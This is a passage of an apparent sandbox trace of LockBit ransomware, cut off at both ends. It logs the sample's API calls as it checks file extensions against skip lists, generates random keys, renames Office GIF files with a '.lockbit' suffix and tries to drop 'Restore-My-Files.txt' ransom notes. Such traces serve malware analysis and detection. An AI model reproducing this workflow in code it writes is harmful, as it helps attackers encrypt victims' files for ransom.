NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14981_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.554] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.554] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.554] free (_Block=0x1fa2ed8) [0203.554] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14981_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.554] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.554] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.554] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc56d8700, ftCreationTime.dwHighDateTime=0x1bd4f41, ftLastAccessTime.dwLowDateTime=0xbca5cca0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc56d8700, ftLastWriteTime.dwHighDateTime=0x1bd4f41, nFileSizeHigh=0x0, nFileSizeLow=0xc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14982_.GIF", cAlternateFileName="")) returned 1 [0203.554] lstrcmpiW (lpString1=".", lpString2="BD14982_.GIF") returned -1 [0203.554] lstrcmpiW (lpString1="..", lpString2="BD14982_.GIF") returned -1 [0203.554] PathFindExtensionW (pszPath="BD14982_.GIF") returned=".GIF" [0203.554] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.554] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.554] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.554] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.554] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.554] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.554] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.554] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.554] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.554] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.554] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.554] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.554] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.555] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.555] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.555] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.555] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.555] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.555] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.555] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.556] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14982_.GIF") returned 1 [0203.556] lstrcmpiW (lpString1="ntldr", lpString2="BD14982_.GIF") returned 1 [0203.556] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14982_.GIF") returned 1 [0203.556] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14982_.GIF") returned 1 [0203.556] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14982_.GIF") returned -1 [0203.556] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14982_.GIF") returned 1 [0203.556] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14982_.GIF") returned 1 [0203.556] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.556] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14982_.GIF") returned=".GIF" [0203.556] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.556] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.556] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.556] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.556] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.556] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.556] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.556] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.556] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.556] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.556] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.556] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.556] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.556] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.556] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.556] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.556] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.556] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.556] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.556] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.556] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.556] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.556] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.556] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.556] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.556] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.556] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.557] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.557] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14982_.GIF.lockbit") returned 78 [0203.557] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14982_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14982_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.558] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.558] malloc (_Size=0x40068) returned 0x3df0008 [0203.558] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=198) returned 1 [0203.558] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.558] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.558] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.559] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.559] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.562] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14982_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14982_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.562] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.562] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.562] free (_Block=0x1fa2ed8) [0203.562] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14982_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.562] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.562] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.562] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc43c5a00, ftCreationTime.dwHighDateTime=0x1bd4f41, ftLastAccessTime.dwLowDateTime=0xbca5cca0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc43c5a00, ftLastWriteTime.dwHighDateTime=0x1bd4f41, nFileSizeHigh=0x0, nFileSizeLow=0x7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14983_.GIF", cAlternateFileName="")) returned 1 [0203.563] lstrcmpiW (lpString1=".", lpString2="BD14983_.GIF") returned -1 [0203.563] lstrcmpiW (lpString1="..", lpString2="BD14983_.GIF") returned -1 [0203.563] PathFindExtensionW (pszPath="BD14983_.GIF") returned=".GIF" [0203.563] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.563] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.563] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.563] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.563] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.563] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.563] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.563] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.563] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.563] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.563] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.563] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.563] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.563] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.563] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.563] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.563] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.563] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.563] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.563] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.563] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.563] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.563] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.564] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.564] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.564] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.564] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14983_.GIF") returned 1 [0203.564] lstrcmpiW (lpString1="ntldr", lpString2="BD14983_.GIF") returned 1 [0203.564] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14983_.GIF") returned 1 [0203.564] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14983_.GIF") returned 1 [0203.564] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14983_.GIF") returned -1 [0203.564] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14983_.GIF") returned 1 [0203.564] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14983_.GIF") returned 1 [0203.564] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.564] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14983_.GIF") returned=".GIF" [0203.564] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.564] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.564] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.565] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.565] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.565] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.565] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.565] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.565] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.565] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.565] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.565] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.565] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.565] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.565] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.565] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.565] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.565] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.565] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.565] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.565] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.565] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.565] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.565] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.565] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.565] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.565] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.565] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14983_.GIF.lockbit") returned 78 [0203.565] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14983_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14983_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.566] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.567] malloc (_Size=0x40068) returned 0x3df0008 [0203.567] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=124) returned 1 [0203.567] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.567] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.567] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.567] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.567] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.571] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14983_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14983_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.571] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.571] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.571] free (_Block=0x1fa2ed8) [0203.571] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14983_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.571] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.571] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.571] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc30b2d00, ftCreationTime.dwHighDateTime=0x1bd4f41, ftLastAccessTime.dwLowDateTime=0xbca5cca0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc30b2d00, ftLastWriteTime.dwHighDateTime=0x1bd4f41, nFileSizeHigh=0x0, nFileSizeLow=0xb6, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14984_.GIF", cAlternateFileName="")) returned 1 [0203.571] lstrcmpiW (lpString1=".", lpString2="BD14984_.GIF") returned -1 [0203.571] lstrcmpiW (lpString1="..", lpString2="BD14984_.GIF") returned -1 [0203.571] PathFindExtensionW (pszPath="BD14984_.GIF") returned=".GIF" [0203.571] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.571] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.571] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.571] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.571] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.571] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.571] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.571] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.571] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.571] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.572] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.572] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.572] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.572] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.572] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.572] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.572] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.572] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.572] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.572] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.572] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.572] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.572] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.572] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.572] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.572] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.572] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.572] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.572] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.572] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.572] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.572] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.572] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.572] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.573] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.573] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.573] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.573] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.573] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.573] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.573] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.573] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.573] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.573] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.573] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.573] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.573] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.573] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14984_.GIF") returned 1 [0203.573] lstrcmpiW (lpString1="ntldr", lpString2="BD14984_.GIF") returned 1 [0203.573] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14984_.GIF") returned 1 [0203.573] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14984_.GIF") returned 1 [0203.573] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14984_.GIF") returned -1 [0203.573] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14984_.GIF") returned 1 [0203.573] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14984_.GIF") returned 1 [0203.573] PathAddBackslashW (in: pszPath="C:\\\\Program 